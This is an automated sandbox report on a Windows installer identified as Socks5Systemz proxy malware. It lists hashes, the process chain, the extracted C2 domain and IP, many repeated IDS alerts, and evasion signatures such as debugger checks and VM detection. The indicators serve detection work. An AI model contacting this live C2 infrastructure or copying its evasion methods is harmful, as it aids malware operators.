Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eCh9R4T214.exe

Overview

General Information

Sample name:eCh9R4T214.exe
renamed because original name is a hash value
Original sample name:faefae3ea2db457031eb3f72ab6fedf5.exe
Analysis ID:1526384
MD5:faefae3ea2db457031eb3f72ab6fedf5
SHA1:7f5be1428e1d3a448f59fbf0137b635723e6d8b1
SHA256:e0e8ba8972785e5f8c0e1dc0d67fd3135cea8ad382c9d8e303b0a3bac50b8e8b
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has a writeable .text section
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • eCh9R4T214.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\eCh9R4T214.exe" MD5: FAEFAE3EA2DB457031EB3F72AB6FEDF5)
    • eCh9R4T214.tmp (PID: 1372 cmdline: "C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp" /SL5="$103F8,4124077,54272,C:\Users\user\Desktop\eCh9R4T214.exe" MD5: 16C9D19AB32C18671706CEFEE19B6949)
      • gepardfixmp3_32.exe (PID: 4888 cmdline: "C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe" -i MD5: FBBCE7B2EF79BF1D1711CCA350EA2C5A)
  • cleanup
{"C2 list": ["bmvdljb.com"]}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000003.00000002.3386708643.0000000002B7E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: gepardfixmp3_32.exe PID: 4888JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-05T14:46:04.160167+020020494671A Network Trojan was detected192.168.2.661580185.208.158.24880TCP
        2024-10-05T14:46:05.038767+020020494671A Network Trojan was detected192.168.2.661581185.208.158.24880TCP
        2024-10-05T14:46:05.888736+020020494671A Network Trojan was detected192.168.2.661582185.208.158.24880TCP
        2024-10-05T14:46:06.703223+020020494671A Network Trojan was detected192.168.2.661583185.208.158.24880TCP
        2024-10-05T14:46:07.534444+020020494671A Network Trojan was detected192.168.2.661584185.208.158.24880TCP
        2024-10-05T14:46:08.356222+020020494671A Network Trojan was detected192.168.2.661585185.208.158.24880TCP
        2024-10-05T14:46:09.201934+020020494671A Network Trojan was detected192.168.2.661586185.208.158.24880TCP
        2024-10-05T14:46:10.010785+020020494671A Network Trojan was detected192.168.2.661587185.208.158.24880TCP
        2024-10-05T14:46:10.360667+020020494671A Network Trojan was detected192.168.2.661587185.208.158.24880TCP
        2024-10-05T14:46:11.177761+020020494671A Network Trojan was detected192.168.2.661588185.208.158.24880TCP
        2024-10-05T14:46:11.978001+020020494671A Network Trojan was detected192.168.2.661589185.208.158.24880TCP
        2024-10-05T14:46:12.331109+020020494671A Network Trojan was detected192.168.2.661589185.208.158.24880TCP
        2024-10-05T14:46:13.145967+020020494671A Network Trojan was detected192.168.2.661590185.208.158.24880TCP
        2024-10-05T14:46:13.968198+020020494671A Network Trojan was detected192.168.2.661591185.208.158.24880TCP
        2024-10-05T14:46:14.781720+020020494671A Network Trojan was detected192.168.2.661593185.208.158.24880TCP
        2024-10-05T14:46:15.799749+020020494671A Network Trojan was detected192.168.2.661594185.208.158.24880TCP
        2024-10-05T14:46:16.615648+020020494671A Network Trojan was detected192.168.2.661595185.208.158.24880TCP
        2024-10-05T14:46:17.423643+020020494671A Network Trojan was detected192.168.2.661596185.208.158.24880TCP
        2024-10-05T14:46:18.274069+020020494671A Network Trojan was detected192.168.2.661597185.208.158.24880TCP
        2024-10-05T14:46:18.636320+020020494671A Network Trojan was detected192.168.2.661597185.208.158.24880TCP
        2024-10-05T14:46:18.986658+020020494671A Network Trojan was detected192.168.2.661597185.208.158.24880TCP
        2024-10-05T14:46:19.806085+020020494671A Network Trojan was detected192.168.2.661598185.208.158.24880TCP
        2024-10-05T14:46:20.161675+020020494671A Network Trojan was detected192.168.2.661598185.208.158.24880TCP
        2024-10-05T14:46:20.973032+020020494671A Network Trojan was detected192.168.2.661599185.208.158.24880TCP
        2024-10-05T14:46:21.965522+020020494671A Network Trojan was detected192.168.2.661600185.208.158.24880TCP
        2024-10-05T14:46:22.315201+020020494671A Network Trojan was detected192.168.2.661600185.208.158.24880TCP
        2024-10-05T14:46:23.129284+020020494671A Network Trojan was detected192.168.2.661601185.208.158.24880TCP
        2024-10-05T14:46:23.941441+020020494671A Network Trojan was detected192.168.2.661602185.208.158.24880TCP
        2024-10-05T14:46:24.755828+020020494671A Network Trojan was detected192.168.2.661603185.208.158.24880TCP
        2024-10-05T14:46:25.596474+020020494671A Network Trojan was detected192.168.2.661604185.208.158.24880TCP
        2024-10-05T14:46:26.421087+020020494671A Network Trojan was detected192.168.2.661605185.208.158.24880TCP
        2024-10-05T14:46:27.257482+020020494671A Network Trojan was detected192.168.2.661606185.208.158.24880TCP
        2024-10-05T14:46:28.060044+020020494671A Network Trojan was detected192.168.2.661607185.208.158.24880TCP
        2024-10-05T14:46:28.899508+020020494671A Network Trojan was detected192.168.2.661608185.208.158.24880TCP
        2024-10-05T14:46:29.801366+020020494671A Network Trojan was detected192.168.2.661609185.208.158.24880TCP
        2024-10-05T14:46:30.608747+020020494671A Network Trojan was detected192.168.2.661610185.208.158.24880TCP
        2024-10-05T14:46:31.421889+020020494671A Network Trojan was detected192.168.2.661611185.208.158.24880TCP
        2024-10-05T14:46:32.272445+020020494671A Network Trojan was detected192.168.2.661612185.208.158.24880TCP
        2024-10-05T14:46:33.082963+020020494671A Network Trojan was detected192.168.2.661613185.208.158.24880TCP
        2024-10-05T14:46:34.103766+020020494671A Network Trojan was detected192.168.2.661614185.208.158.24880TCP
        2024-10-05T14:46:34.457190+020020494671A Network Trojan was detected192.168.2.661614185.208.158.24880TCP
        2024-10-05T14:46:35.318254+020020494671A Network Trojan was detected192.168.2.661615185.208.158.24880TCP
        2024-10-05T14:46:36.130968+020020494671A Network Trojan was detected192.168.2.661616185.208.158.24880TCP
        2024-10-05T14:46:36.935118+020020494671A Network Trojan was detected192.168.2.661617185.208.158.24880TCP
        2024-10-05T14:46:37.792518+020020494671A Network Trojan was detected192.168.2.661618185.208.158.24880TCP
        2024-10-05T14:46:38.151611+020020494671A Network Trojan was detected192.168.2.661618185.208.158.24880TCP
        2024-10-05T14:46:38.514866+020020494671A Network Trojan was detected192.168.2.661618185.208.158.24880TCP
        2024-10-05T14:46:39.361337+020020494671A Network Trojan was detected192.168.2.661620185.208.158.24880TCP
        2024-10-05T14:46:40.192534+020020494671A Network Trojan was detected192.168.2.661621185.208.158.24880TCP
        2024-10-05T14:46:41.015282+020020494671A Network Trojan was detected192.168.2.661622185.208.158.24880TCP
        2024-10-05T14:46:41.857430+020020494671A Network Trojan was detected192.168.2.661623185.208.158.24880TCP
        2024-10-05T14:46:42.672734+020020494671A Network Trojan was detected192.168.2.661624185.208.158.24880TCP
        2024-10-05T14:46:43.490982+020020494671A Network Trojan was detected192.168.2.661625185.208.158.24880TCP
        2024-10-05T14:46:44.300816+020020494671A Network Trojan was detected192.168.2.661626185.208.158.24880TCP
        2024-10-05T14:46:45.406695+020020494671A Network Trojan was detected192.168.2.661627185.208.158.24880TCP
        2024-10-05T14:46:46.788860+020020494671A Network Trojan was detected192.168.2.661628185.208.158.24880TCP
        2024-10-05T14:46:47.605807+020020494671A Network Trojan was detected192.168.2.661629185.208.158.24880TCP
        2024-10-05T14:46:48.446477+020020494671A Network Trojan was detected192.168.2.661630185.208.158.24880TCP
        2024-10-05T14:46:48.802019+020020494671A Network Trojan was detected192.168.2.661630185.208.158.24880TCP
        2024-10-05T14:46:49.633897+020020494671A Network Trojan was detected192.168.2.661631185.208.158.24880TCP
        2024-10-05T14:46:50.587660+020020494671A Network Trojan was detected192.168.2.661632185.208.158.24880TCP
        2024-10-05T14:46:50.936577+020020494671A Network Trojan was detected192.168.2.661632185.208.158.24880TCP
        2024-10-05T14:46:51.752824+020020494671A Network Trojan was detected192.168.2.661633185.208.158.24880TCP
        2024-10-05T14:46:52.576930+020020494671A Network Trojan was detected192.168.2.661634185.208.158.24880TCP
        2024-10-05T14:46:53.452511+020020494671A Network Trojan was detected192.168.2.661635185.208.158.24880TCP
        2024-10-05T14:46:54.276514+020020494671A Network Trojan was detected192.168.2.661636185.208.158.24880TCP
        2024-10-05T14:46:55.100652+020020494671A Network Trojan was detected192.168.2.661637185.208.158.24880TCP
        2024-10-05T14:46:56.010978+020020494671A Network Trojan was detected192.168.2.661638185.208.158.24880TCP
        2024-10-05T14:46:57.245773+020020494671A Network Trojan was detected192.168.2.661638185.208.158.24880TCP
        2024-10-05T14:46:57.598414+020020494671A Network Trojan was detected192.168.2.661638185.208.158.24880TCP
        2024-10-05T14:46:58.433700+020020494671A Network Trojan was detected192.168.2.661639185.208.158.24880TCP
        2024-10-05T14:46:59.289125+020020494671A Network Trojan was detected192.168.2.661640185.208.158.24880TCP
        2024-10-05T14:47:00.090448+020020494671A Network Trojan was detected192.168.2.661641185.208.158.24880TCP
        2024-10-05T14:47:00.898093+020020494671A Network Trojan was detected192.168.2.661642185.208.158.24880TCP
        2024-10-05T14:47:01.714241+020020494671A Network Trojan was detected192.168.2.661643185.208.158.24880TCP
        2024-10-05T14:47:02.061777+020020494671A Network Trojan was detected192.168.2.661643185.208.158.24880TCP
        2024-10-05T14:47:02.875909+020020494671A Network Trojan was detected192.168.2.661644185.208.158.24880TCP
        2024-10-05T14:47:03.716529+020020494671A Network Trojan was detected192.168.2.661645185.208.158.24880TCP
        2024-10-05T14:47:04.542737+020020494671A Network Trojan was detected192.168.2.661646185.208.158.24880TCP
        2024-10-05T14:47:05.351360+020020494671A Network Trojan was detected192.168.2.661647185.208.158.24880TCP
        2024-10-05T14:47:06.172761+020020494671A Network Trojan was detected192.168.2.661648185.208.158.24880TCP
        2024-10-05T14:47:06.982940+020020494671A Network Trojan was detected192.168.2.661649185.208.158.24880TCP
        2024-10-05T14:47:07.806832+020020494671A Network Trojan was detected192.168.2.661650185.208.158.24880TCP
        2024-10-05T14:47:08.631956+020020494671A Network Trojan was detected192.168.2.661652185.208.158.24880TCP
        2024-10-05T14:47:09.453121+020020494671A Network Trojan was detected192.168.2.661653185.208.158.24880TCP
        2024-10-05T14:47:10.269795+020020494671A Network Trojan was detected192.168.2.661654185.208.158.24880TCP
        2024-10-05T14:47:11.115553+020020494671A Network Trojan was detected192.168.2.661655185.208.158.24880TCP
        2024-10-05T14:47:11.926229+020020494671A Network Trojan was detected192.168.2.661656185.208.158.24880TCP
        2024-10-05T14:47:12.943570+020020494671A Network Trojan was detected192.168.2.661657185.208.158.24880TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: eCh9R4T214.exeAvira: detected
        Source: gepardfixmp3_32.exe.4888.3.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["bmvdljb.com"]}
        Source: C:\ProgramData\Epic Project Studio 10.4.46\Epic Project Studio 10.4.46.exeReversingLabs: Detection: 29%
        Source: C:\ProgramData\Epic Project Studio 10.4.46\Epic Project Studio 10.4.46.exeVirustotal: Detection: 34%Perma Link
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeReversingLabs: Detection: 29%
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeVirustotal: Detection: 34%Perma Link
        Source: eCh9R4T214.exeReversingLabs: Detection: 26%
        Source: eCh9R4T214.exeVirustotal: Detection: 29%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D4EC
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0045D5A0 ArcFourCrypt,1_2_0045D5A0
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0045D5B8 ArcFourCrypt,1_2_0045D5B8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

        barindex
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeUnpacked PE file: 3.2.gepardfixmp3_32.exe.400000.0.unpack
        Source: eCh9R4T214.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00452A4C FindFirstFileA,GetLastError,1_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,1_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497A74

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61582 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61581 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61588 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61611 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61599 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61595 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61585 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61589 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61593 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61640 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61590 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61621 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61591 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61583 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61624 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61597 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61610 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61586 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61604 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61652 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61629 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61607 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61628 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61596 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61637 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61632 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61634 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61580 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61616 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61645 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61594 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61587 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61614 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61627 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61598 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61636 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61584 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61650 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61618 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61612 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61608 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61641 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61646 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61647 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61622 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61649 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61657 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61633 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61609 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61644 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61626 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61602 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61631 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61613 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61656 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61606 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61625 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61653 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61639 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61600 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61643 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61615 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61603 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61655 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61623 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61635 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61620 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61601 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61605 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61638 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61648 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61654 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61630 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:61642 -> 185.208.158.248:80
